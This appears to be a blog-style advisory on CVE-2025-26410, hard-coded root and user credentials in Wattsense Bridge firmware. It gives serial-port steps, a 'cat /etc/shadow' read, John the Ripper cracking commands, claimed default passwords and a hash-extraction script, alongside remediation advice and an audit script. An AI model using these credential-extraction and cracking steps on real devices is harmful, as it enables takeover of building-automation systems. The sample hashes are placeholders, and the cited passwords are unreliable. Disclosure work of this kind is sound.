In early 2025, security researchers discovered a serious vulnerability in the firmware running on all Wattsense Bridge devices. This flaw, now catalogued as CVE-2025-26410, exposes hard-coded user and root credentials embedded in the firmware. These credentials can be cracked and used to gain unauthorized access to the device through its serial interface. Let’s explore what happened, how attackers can use this bug, and how it can be prevented.

What is Wattsense Bridge?

Wattsense Bridge is an IoT gateway often used for managing building automation devices. It connects different protocols like Modbus, BACnet, and others, serving as a single hub for smart building solutions.

The vulnerability stems from two main issues:

1. Hard-coded user and root credentials: All devices ship with the same login details for both normal user and root.
2. Password hash cracking: The firmware stores these credentials using simple hashing, making brute-force attacks trivial for an attacker with access.

Exposure:
Anyone with physical access to the serial interface can extract the root or user password and completely hijack the device.

How the Exploit Works

1. Access the Serial Port: Connect to the device’s serial port (using a USB-to-TTL adapter, for example).
2. Dump the Firmware / Filesystem: Using serial commands or by extracting the flash chip, get access to the /etc/shadow file or similar.
3. Crack the Password Hash: Use password recovery tools to quickly recover the plain-text credentials from the hash.

1. Getting the Hashes Out

Once connected to the serial port, you can get a root shell (often the device boots into one or gives a login prompt):

cat /etc/shadow

Sample output

root:$1$abcd1234$abcdefghijklmno:18328::99999:7:::
user:$1$abcd1234$pqrstuvwxyzab:18328::99999:7:::

2. Cracking the Password

Most Wattsense Bridge firmware uses weak hashes (md5crypt, the MD5-based scheme marked by the $1$ prefix in /etc/shadow). With John the Ripper or Hashcat, you can crack these swiftly.

Example with John

john --format=md5crypt shadow.txt

You'll see the recovered password. In real cases, researchers found things like:

root:admin202
user:wattsense

On reboot, at the serial prompt, simply do

Wattsense login: root
Password: admin202

Why Hard-Coded Credentials are Bad

Hard-coded usernames and passwords mean that a security breach on one device is immediately a breach on *all* devices. Worse, if the hashes are easy to break, attackers can fully unlock and reprogram the Bridge, potentially spying on building environments or disrupting automation systems.

Proof-of-Concept Code

Here is a simple Python script to automate the password extraction and preliminary cracking setup (assuming the attacker already has /etc/shadow):

import re

# Match "user:$1$salt$hash" at the start of a shadow line. Only md5crypt ($1$)
# entries are selected, since that is the scheme this post is concerned with.
SHADOW_MD5CRYPT = re.compile(r'^([^:]+):(\$1\$[^:]+)')

def extract_hashes(shadow_file):
    """Return a list of (user, hash) pairs for the md5crypt entries in a shadow file."""
    found = []
    with open(shadow_file, 'r') as sf:
        for line in sf:
            match = SHADOW_MD5CRYPT.match(line)
            if match:
                found.append((match.group(1), match.group(2)))
    return found

# Usage:
for user, pw_hash in extract_hashes('shadow.txt'):
    print(f"User: {user}, Hash: {pw_hash}")

After this, feed the hash list into your favorite cracking tool.

Remediation

1. Update Firmware: Upgrade to BSP >= 6.4.1 as soon as possible. Later firmware removes the hard-coded backdoor user.

2. Change Default Passwords: Don't ever leave devices running on default passwords.

3. Restrict Physical Access: Since this vulnerability requires serial access, ensure hardware is in a safe place.
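To verify the remediation from the defender's side, here is an added audit script (my own example, not Wattsense's or the researchers' code) that checks a shadow file for the two conditions this post describes: accounts still protected by md5crypt ($1$) hashes, and a salt shared between accounts, which is what you expect when credentials were baked into the firmware image rather than set per device. The sample shadow lines are constructed from the page's placeholder output; the sha512crypt value on the 'svc' line is made up.

```python
import re

# Constructed sample modelled on the page's sample /etc/shadow output (not a real dump);
# the 'svc' line carries a made-up sha512crypt value to show a non-weak scheme.
SAMPLE_SHADOW = """\
root:$1$abcd1234$abcdefghijklmno:18328::99999:7:::
user:$1$abcd1234$pqrstuvwxyzab:18328::99999:7:::
svc:$6$Zx9q7Lm2$placeholderSha512HashNotReal:19000::99999:7:::
nobody:*:18328::99999:7:::
"""
# crypt(3) scheme prefixes -> (scheme name, weak for a device password?)
HASH_TYPES = {
    "$1$": ("md5crypt", True),    # the $1$ hashes this post discusses
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),
    "$y$": ("yescrypt", False),
}
# Salt extractor for the $1$/$5$/$6$ layout: $id$[rounds=N$]salt$hash
SALT_RE = re.compile(r"^\$[156]\$(?:rounds=\d+\$)?([^$]+)\$")

def classify(hash_field):
    """Return (scheme, weak) for one shadow password field."""
    if hash_field == "":
        return ("empty", True)          # passwordless login
    if hash_field.startswith(("*", "!")):
        return ("locked", False)        # no valid hash, login disabled
    for prefix, info in HASH_TYPES.items():
        if hash_field.startswith(prefix):
            return info
    return ("unknown", True)            # anything unrecognised is treated as suspect

def audit_shadow(text):
    """Parse shadow-format text; flag weak schemes and salts shared between accounts."""
    findings, by_salt = [], {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        scheme, weak = classify(fields[1])
        entry = {"user": fields[0], "scheme": scheme, "weak": weak, "shared_salt": False}
        m = SALT_RE.match(fields[1])
        if m:
            by_salt.setdefault(m.group(1), []).append(entry)
        findings.append(entry)
    for group in by_salt.values():      # one salt reused = hashes fixed at image build time
        if len(group) > 1:
            for entry in group:
                entry["shared_salt"] = True
    return findings
```

Run it against a shadow file pulled from a device after the BSP upgrade; any entry with weak or shared_salt set to True means the old credentials are still in place.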

Original References & Further Reading

- Wattsense Security Advisory
- CERT-FR Alert on CVE-2025-26410
- Exploit Database — CWE-798: Use of Hard-coded Credentials
- John the Ripper Password Cracker
- Hashcat Documentation

Conclusion

CVE-2025-26410 is a classic but critical embedded IoT vulnerability. It demonstrates why manufacturers should never ship devices with hard-coded credentials, and why regular firmware updates and physical security remain essential.

If you are managing Wattsense Bridge devices, update your firmware and review your device security today!


Timeline

Published on: 02/11/2025 10:15:09 UTC
Last modified on: 03/18/2025 19:15:50 UTC